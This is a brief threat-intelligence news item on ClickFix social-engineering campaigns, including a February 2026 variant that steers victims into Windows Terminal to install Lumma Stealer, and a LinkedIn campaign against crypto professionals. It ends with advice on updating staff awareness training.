Microsoft Threat Intelligence confirmed that ClickFix campaigns are now targeting thousands of enterprise and end-user devices globally every day. The social engineering technique tricks users into running malicious commands by impersonating error messages, CAPTCHA checks, or minor technical issues.
The February 2026 variant escalated the approach significantly: instead of instructing users to open the Windows Run dialog, it guides them to press Win+X then I to open Windows Terminal directly — a privileged command execution environment that blends into legitimate administrative workflows. The payload delivers the Lumma Stealer malware.
A separate campaign targets cryptocurrency and Web3 professionals through fake venture capital identities and spoofed video conferencing links on LinkedIn. Staff awareness training should be updated to address ClickFix variants specifically — the Windows Terminal vector is new and effective, and traditional "don't click suspicious links" guidance does not cover it.